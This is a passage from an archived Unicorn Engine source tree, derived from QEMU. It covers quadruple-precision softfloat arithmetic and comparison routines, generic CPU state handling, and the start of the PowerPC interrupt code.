&rem1, &rem2 ); while ( (int64_t) rem0 < 0 ) { --zSig0; add192( rem0, rem1, rem2, 0, bSig0, bSig1, &rem0, &rem1, &rem2 ); } zSig1 = estimateDiv128To64( rem1, rem2, bSig0 ); if ( ( zSig1 & 0x3FFF ) <= 4 ) { mul128By64To192( bSig0, bSig1, zSig1, &term1, &term2, &term3 ); sub192( rem1, rem2, 0, term1, term2, term3, &rem1, &rem2, &rem3 ); while ( (int64_t) rem1 < 0 ) { --zSig1; add192( rem1, rem2, rem3, 0, bSig0, bSig1, &rem1, &rem2, &rem3 ); } zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); } shift128ExtraRightJamming( zSig0, zSig1, 0, 15, &zSig0, &zSig1, &zSig2 ); return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status); } /*---------------------------------------------------------------------------- | Returns the remainder of the quadruple-precision floating-point value `a' | with respect to the corresponding value `b'. The operation is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 float128_rem(float128 a, float128 b, float_status *status) { flag aSign, zSign; int32_t aExp, bExp, expDiff; uint64_t aSig0, aSig1, bSig0, bSig1, q, term0, term1, term2; uint64_t allZero, alternateASig0, alternateASig1, sigMean1; int64_t sigMean0; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); bSig1 = extractFloat128Frac1( b ); bSig0 = extractFloat128Frac0( b ); bExp = extractFloat128Exp( b ); if ( aExp == 0x7FFF ) { if ( ( aSig0 | aSig1 ) || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) { return propagateFloat128NaN(a, b, status); } goto invalid; } if ( bExp == 0x7FFF ) { if (bSig0 | bSig1) { return propagateFloat128NaN(a, b, status); } return a; } if ( bExp == 0 ) { if ( ( bSig0 | bSig1 ) == 0 ) { invalid: float_raise(float_flag_invalid, status); return float128_default_nan(status); } normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); } if ( aExp == 0 ) { if ( ( aSig0 | aSig1 ) == 0 ) return a; normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); } expDiff = aExp - bExp; if ( expDiff < -1 ) return a; shortShift128Left( aSig0 | UINT64_C(0x0001000000000000), aSig1, 15 - ( expDiff < 0 ), &aSig0, &aSig1 ); shortShift128Left( bSig0 | UINT64_C(0x0001000000000000), bSig1, 15, &bSig0, &bSig1 ); q = le128( bSig0, bSig1, aSig0, aSig1 ); if ( q ) sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 ); expDiff -= 64; while ( 0 < expDiff ) { q = estimateDiv128To64( aSig0, aSig1, bSig0 ); q = ( 4 < q ) ? q - 4 : 0; mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 ); shortShift192Left( term0, term1, term2, 61, &term1, &term2, &allZero ); shortShift128Left( aSig0, aSig1, 61, &aSig0, &allZero ); sub128( aSig0, 0, term1, term2, &aSig0, &aSig1 ); expDiff -= 61; } if ( -64 < expDiff ) { q = estimateDiv128To64( aSig0, aSig1, bSig0 ); q = ( 4 < q ) ? q - 4 : 0; q >>= - expDiff; shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 ); expDiff += 52; if ( expDiff < 0 ) { shift128Right( aSig0, aSig1, - expDiff, &aSig0, &aSig1 ); } else { shortShift128Left( aSig0, aSig1, expDiff, &aSig0, &aSig1 ); } mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 ); sub128( aSig0, aSig1, term1, term2, &aSig0, &aSig1 ); } else { shift128Right( aSig0, aSig1, 12, &aSig0, &aSig1 ); shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 ); } do { alternateASig0 = aSig0; alternateASig1 = aSig1; ++q; sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 ); } while ( 0 <= (int64_t) aSig0 ); add128( aSig0, aSig1, alternateASig0, alternateASig1, (uint64_t *)&sigMean0, &sigMean1 ); if ( ( sigMean0 < 0 ) || ( ( ( sigMean0 | sigMean1 ) == 0 ) && ( q & 1 ) ) ) { aSig0 = alternateASig0; aSig1 = alternateASig1; } zSign = ( (int64_t) aSig0 < 0 ); if ( zSign ) sub128( 0, 0, aSig0, aSig1, &aSig0, &aSig1 ); return normalizeRoundAndPackFloat128(aSign ^ zSign, bExp - 4, aSig0, aSig1, status); } /*---------------------------------------------------------------------------- | Returns the square root of the quadruple-precision floating-point value `a'. | The operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 float128_sqrt(float128 a, float_status *status) { flag aSign; int32_t aExp, zExp; uint64_t aSig0, aSig1, zSig0, zSig1, zSig2, doubleZSig0; uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp == 0x7FFF ) { if (aSig0 | aSig1) { return propagateFloat128NaN(a, a, status); } if ( ! aSign ) return a; goto invalid; } if ( aSign ) { if ( ( aExp | aSig0 | aSig1 ) == 0 ) return a; invalid: float_raise(float_flag_invalid, status); return float128_default_nan(status); } if ( aExp == 0 ) { if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( 0, 0, 0, 0 ); normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); } zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFE; aSig0 |= UINT64_C(0x0001000000000000); zSig0 = estimateSqrt32( aExp, aSig0>>17 ); shortShift128Left( aSig0, aSig1, 13 - ( aExp & 1 ), &aSig0, &aSig1 ); zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 ); doubleZSig0 = zSig0<<1; mul64To128( zSig0, zSig0, &term0, &term1 ); sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 ); while ( (int64_t) rem0 < 0 ) { --zSig0; doubleZSig0 -= 2; add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 ); } zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 ); if ( ( zSig1 & 0x1FFF ) <= 5 ) { if ( zSig1 == 0 ) zSig1 = 1; mul64To128( doubleZSig0, zSig1, &term1, &term2 ); sub128( rem1, 0, term1, term2, &rem1, &rem2 ); mul64To128( zSig1, zSig1, &term2, &term3 ); sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 ); while ( (int64_t) rem1 < 0 ) { --zSig1; shortShift128Left( 0, zSig1, 1, &term2, &term3 ); term3 |= 1; term2 |= doubleZSig0; add192( rem1, rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 ); } zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); } shift128ExtraRightJamming( zSig0, zSig1, 0, 14, &zSig0, &zSig1, &zSig2 ); return roundAndPackFloat128(0, zExp, zSig0, zSig1, zSig2, status); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. Otherwise, the comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_eq(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 0; } return ( a.low == b.low ) && ( ( a.high == b.high ) || ( ( a.low == 0 ) && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | or equal to the corresponding value `b', and 0 otherwise. The invalid | exception is raised if either operand is a NaN. The comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_le(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) == 0 ); } return aSign ? le128( b.high, b.low, a.high, a.low ) : le128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. The comparison is performed according | to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_lt(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) != 0 ); } return aSign ? lt128( b.high, b.low, a.high, a.low ) : lt128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. The invalid exception is raised if either | operand is a NaN. The comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_unordered(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. The comparison is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_eq_quiet(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } return ( a.low == b.low ) && ( ( a.high == b.high ) || ( ( a.low == 0 ) && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | or equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not | cause an exception. Otherwise, the comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_le_quiet(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) == 0 ); } return aSign ? le128( b.high, b.low, a.high, a.low ) : le128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. Otherwise, the comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_lt_quiet(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) != 0 ); } return aSign ? lt128( b.high, b.low, a.high, a.low ) : lt128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The | comparison is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_unordered_quiet(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 1; } return 0; } static inline int floatx80_compare_internal(floatx80 a, floatx80 b, int is_quiet, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return float_relation_unordered; } if (( ( extractFloatx80Exp( a ) == 0x7fff ) && ( extractFloatx80Frac( a )<<1 ) ) || ( ( extractFloatx80Exp( b ) == 0x7fff ) && ( extractFloatx80Frac( b )<<1 ) )) { if (!is_quiet || floatx80_is_signaling_nan(a, status) || floatx80_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return float_relation_unordered; } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign != bSign ) { if ( ( ( (uint16_t) ( ( a.high | b.high ) << 1 ) ) == 0) && ( ( a.low | b.low ) == 0 ) ) { /* zero case */ return float_relation_equal; } else { return 1 - (2 * aSign); } } else { if (a.low == b.low && a.high == b.high) { return float_relation_equal; } else { return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); } } } int floatx80_compare(floatx80 a, floatx80 b, float_status *status) { return floatx80_compare_internal(a, b, 0, status); } int floatx80_compare_quiet(floatx80 a, floatx80 b, float_status *status) { return floatx80_compare_internal(a, b, 1, status); } static inline int float128_compare_internal(float128 a, float128 b, int is_quiet, float_status *status) { flag aSign, bSign; if (( ( extractFloat128Exp( a ) == 0x7fff ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7fff ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) )) { if (!is_quiet || float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return float_relation_unordered; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { if ( ( ( ( a.high | b.high )<<1 ) | a.low | b.low ) == 0 ) { /* zero case */ return float_relation_equal; } else { return 1 - (2 * aSign); } } else { if (a.low == b.low && a.high == b.high) { return float_relation_equal; } else { return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); } } } int float128_compare(float128 a, float128 b, float_status *status) { return float128_compare_internal(a, b, 0, status); } int float128_compare_quiet(float128 a, float128 b, float_status *status) { return float128_compare_internal(a, b, 1, status); } floatx80 floatx80_scalbn(floatx80 a, int n, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( aExp == 0x7FFF ) { if ( aSig<<1 ) { return propagateFloatx80NaN(a, a, status); } return a; } if (aExp == 0) { if (aSig == 0) { return a; } aExp++; } if (n > 0x10000) { n = 0x10000; } else if (n < -0x10000) { n = -0x10000; } aExp += n; return normalizeRoundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } float128 float128_scalbn(float128 a, int n, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig0, aSig1; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp == 0x7FFF ) { if ( aSig0 | aSig1 ) { return propagateFloat128NaN(a, a, status); } return a; } if (aExp != 0) { aSig0 |= UINT64_C(0x0001000000000000); } else if (aSig0 == 0 && aSig1 == 0) { return a; } else { aExp++; } if (n > 0x10000) { n = 0x10000; } else if (n < -0x10000) { n = -0x10000; } aExp += n - 1; return normalizeRoundAndPackFloat128( aSign, aExp, aSig0, aSig1 , status); } void softfloat_init(void) { union_float64 ua, ub, uc, ur; if (QEMU_NO_HARDFLOAT) { return; } /* * Test that the host's FMA is not obviously broken. For example, * glibc < 2.23 can perform an incorrect FMA on certain hosts; see * https://sourceware.org/bugzilla/show_bug.cgi?id=13304 */ ua.s = 0x0020000000000001ULL; ub.s = 0x3ca0000000000000ULL; uc.s = 0x0020000000000000ULL; ur.h = fma(ua.h, ub.h, uc.h); if (ur.s != 0x0020000000000001ULL) { force_soft_fma = true; } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014571�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/core/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015521�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/core/cpu.c��������������������������������������������������������������������0000664�0000000�0000000�00000007400�14675241067�0016455�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU CPU model * * Copyright (c) 2012-2014 SUSE LINUX Products GmbH * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #include "uc_priv.h" #include "qemu/osdep.h" #include "hw/core/cpu.h" #include "sysemu/tcg.h" bool cpu_paging_enabled(const CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); return cc->get_paging_enabled(cpu); } static bool cpu_common_get_paging_enabled(const CPUState *cpu) { return false; } void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->get_memory_mapping(cpu, list); } static void cpu_common_get_memory_mapping(CPUState *cpu, MemoryMappingList *list) { // error_setg(errp, "Obtaining memory mappings is unsupported on this CPU."); } /* Resetting the IRQ comes from across the code base so we take the * BQL here if we need to. cpu_interrupt assumes it is held.*/ void cpu_reset_interrupt(CPUState *cpu, int mask) { cpu->interrupt_request &= ~mask; } void cpu_exit(CPUState *cpu) { cpu->exit_request = 1; cpu->tcg_exit_req = 1; cpu->icount_decr_ptr->u16.high = -1; } static void cpu_common_noop(CPUState *cpu) { } static bool cpu_common_exec_interrupt(CPUState *cpu, int int_req) { return false; } void cpu_reset(CPUState *cpu) { CPUClass *klass = CPU_GET_CLASS(cpu); if (klass->reset != NULL) { (*klass->reset)(cpu); } } static void cpu_common_reset(CPUState *dev) { CPUState *cpu = CPU(dev); cpu->interrupt_request = 0; cpu->halted = 0; cpu->mem_io_pc = 0; cpu->icount_extra = 0; cpu->can_do_io = 1; cpu->exception_index = -1; cpu->crash_occurred = false; cpu->cflags_next_tb = -1; cpu_tb_jmp_cache_clear(cpu); cpu->uc->tcg_flush_tlb(cpu->uc); } static bool cpu_common_has_work(CPUState *cs) { return false; } static int64_t cpu_common_get_arch_id(CPUState *cpu) { return cpu->cpu_index; } void cpu_class_init(struct uc_struct *uc, CPUClass *k) { k->get_arch_id = cpu_common_get_arch_id; k->has_work = cpu_common_has_work; k->get_paging_enabled = cpu_common_get_paging_enabled; k->get_memory_mapping = cpu_common_get_memory_mapping; k->debug_excp_handler = cpu_common_noop; k->cpu_exec_enter = cpu_common_noop; k->cpu_exec_exit = cpu_common_noop; k->cpu_exec_interrupt = cpu_common_exec_interrupt; /* instead of dc->reset. */ k->reset = cpu_common_reset; return; } void cpu_common_initfn(struct uc_struct *uc, CPUState *cs) { CPUState *cpu = CPU(cs); cpu->cpu_index = UNASSIGNED_CPU_INDEX; cpu->cluster_index = UNASSIGNED_CLUSTER_INDEX; /* *-user doesn't have configurable SMP topology */ /* the default value is changed by qemu_init_vcpu() for softmmu */ cpu->nr_cores = 1; cpu->nr_threads = 1; QTAILQ_INIT(&cpu->breakpoints); QTAILQ_INIT(&cpu->watchpoints); /* cpu_exec_initfn(cpu); */ cpu->num_ases = 1; cpu->as = &(cpu->uc->address_space_memory); cpu->memory = cpu->uc->system_memory; } void cpu_stop(struct uc_struct *uc) { if (uc->cpu) { uc->cpu->stop = false; uc->cpu->stopped = true; cpu_exit(uc->cpu); } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/i386/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015262�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/i386/x86.c��������������������������������������������������������������������0000664�0000000�0000000�00000002676�14675241067�0016066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU PC System Emulator * * Copyright (c) 2003-2004 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "qemu/compiler.h" #include "sysemu/sysemu.h" #include "target/i386/cpu.h" /* TSC handling */ uint64_t cpu_get_tsc(CPUX86State *env) { return cpu_get_ticks(); } ������������������������������������������������������������������unicorn-2.1.1/qemu/hw/ppc/��������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015353�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/ppc/ppc.c���������������������������������������������������������������������0000664�0000000�0000000�00000130564�14675241067�0016312�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU generic PowerPC hardware System Emulator * * Copyright (c) 2003-2007 Jocelyn Mayer * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "cpu.h" //#include "hw/irq.h" #include "hw/ppc/ppc.h" //#include "hw/ppc/ppc_e500.h" #include "qemu/timer.h" #include "sysemu/cpus.h" //#include "qemu/log.h" //#include "qemu/main-loop.h" //#include "qemu/error-report.h" //#include "sysemu/kvm.h" //#include "sysemu/runstate.h" //#include "kvm_ppc.h" //#include "migration/vmstate.h" //#include "trace.h" //#define PPC_DEBUG_IRQ //#define PPC_DEBUG_TB #ifdef PPC_DEBUG_IRQ # define LOG_IRQ(...) qemu_log_mask(CPU_LOG_INT, ## __VA_ARGS__) #else # define LOG_IRQ(...) do { } while (0) #endif #ifdef PPC_DEBUG_TB # define LOG_TB(...) qemu_log(__VA_ARGS__) #else # define LOG_TB(...) do { } while (0) #endif #if 0 static void cpu_ppc_tb_stop (CPUPPCState *env); static void cpu_ppc_tb_start (CPUPPCState *env); #endif void ppc_set_irq(PowerPCCPU *cpu, int n_IRQ, int level) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; #if 0 unsigned int old_pending; old_pending = env->pending_interrupts; #endif if (level) { env->pending_interrupts |= 1 << n_IRQ; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { env->pending_interrupts &= ~(1 << n_IRQ); if (env->pending_interrupts == 0) { cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); } } #if 0 if (old_pending != env->pending_interrupts) { kvmppc_set_interrupt(cpu, n_IRQ, level); } #endif LOG_IRQ("%s: %p n_IRQ %d level %d => pending %08" PRIx32 "req %08x\n", __func__, env, n_IRQ, level, env->pending_interrupts, CPU(cpu)->interrupt_request); } #if 0 /* PowerPC 6xx / 7xx internal IRQ controller */ static void ppc6xx_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { CPUState *cs = CPU(cpu); switch (pin) { case PPC6xx_INPUT_TBEN: /* Level sensitive - active high */ LOG_IRQ("%s: %s the time base\n", __func__, level ? "start" : "stop"); if (level) { cpu_ppc_tb_start(env); } else { cpu_ppc_tb_stop(env); } case PPC6xx_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPC6xx_INPUT_SMI: /* Level sensitive - active high */ LOG_IRQ("%s: set the SMI IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_SMI, level); break; case PPC6xx_INPUT_MCP: /* Negative edge sensitive */ /* XXX: TODO: actual reaction may depends on HID0 status * 603/604/740/750: check HID0[EMCP] */ if (cur_level == 1 && level == 0) { LOG_IRQ("%s: raise machine check state\n", __func__); ppc_set_irq(cpu, PPC_INTERRUPT_MCK, 1); } break; case PPC6xx_INPUT_CKSTP_IN: /* Level sensitive - active low */ /* XXX: TODO: relay the signal to CKSTP_OUT pin */ /* XXX: Note that the only way to restart the CPU is to reset it */ if (level) { LOG_IRQ("%s: stop the CPU\n", __func__); cs->halted = 1; } break; case PPC6xx_INPUT_HRESET: /* Level sensitive - active low */ if (level) { LOG_IRQ("%s: reset the CPU\n", __func__); cpu_interrupt(cs, CPU_INTERRUPT_RESET); } break; case PPC6xx_INPUT_SRESET: LOG_IRQ("%s: set the RESET IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_RESET, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ 